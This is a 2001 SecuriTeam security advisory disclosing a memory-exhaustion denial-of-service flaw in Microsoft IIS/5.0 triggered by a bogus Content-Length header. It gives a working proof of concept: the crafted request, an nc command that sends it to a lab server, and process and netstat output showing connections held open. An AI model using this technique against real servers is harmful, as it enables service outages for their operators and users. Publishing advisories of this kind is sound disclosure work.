[NT] Microsoft IIS/5 Bogus Content-Length Memory Bug
From: support@securiteam.comDate: 12/12/01
- Previous message: support@securiteam.com: "[UNIX] Buffer Overflow in /bin/login"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Wed, 12 Dec 2001 23:20:23 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Microsoft IIS/5 Bogus Content-Length Memory Bug
------------------------------------------------------------------------
SUMMARY
A security flaw in the way IIS handles mislabeled Content-Length requests
(requests containing HTTP Content-Length without an adequate content
length). The security flaw can cause the server to consume massive amount
of memory that can lead a denial of service attack.
DETAILS
The vulnerability by itself is not a security flaw, but it probably can
lead into denial of service with some tweaking. When you send a bad
request to Microsoft IIS/5.0 server, it gives you the error and closes the
connection, like when you fail to authenticate.
Example (1):
GET /testfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint,
application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Authorization: Basic
Then let us add a "Content-Length: 5300643" field.
When you send the request to the server, it will hang there waiting
something to happen and never close the connection.
Example (2):
$ cat " GET /testfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint,
application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Content-Length: 5300643
Authorization: Basic" >bogus.txt
$ nc 192.168.0.10 80 <bogus.txt &
$ ps x
PID PPID PGID WINPID TTY UID STIME COMMAND
696 1 696 696 con 500 12:22:37 /usr/bin/bash
2464 696 2464 2464 con 500 12:23:56 /usr/bin/nc
2532 696 2532 1552 con 500 12:29:16 /usr/bin/ps
$ netstat -an |grep 192.168.0.10
TCP 192.168.0.4:2479 192.168.0.10:80 ESTABLISHED
Now you have a waiting open connection. You can open as much as you want.
The server never stops the connections and you should never see a timeout.
For something like 4322 open connections with the method described the
Windows server will memory consumption will jump from around 404mb to
920mb.
ADDITIONAL INFORMATION
The information has been provided by
<mailto:ivan.hernandez@globalsis.com.ar> Ivan Hernandez Puga.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[UNIX] Buffer Overflow in /bin/login"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
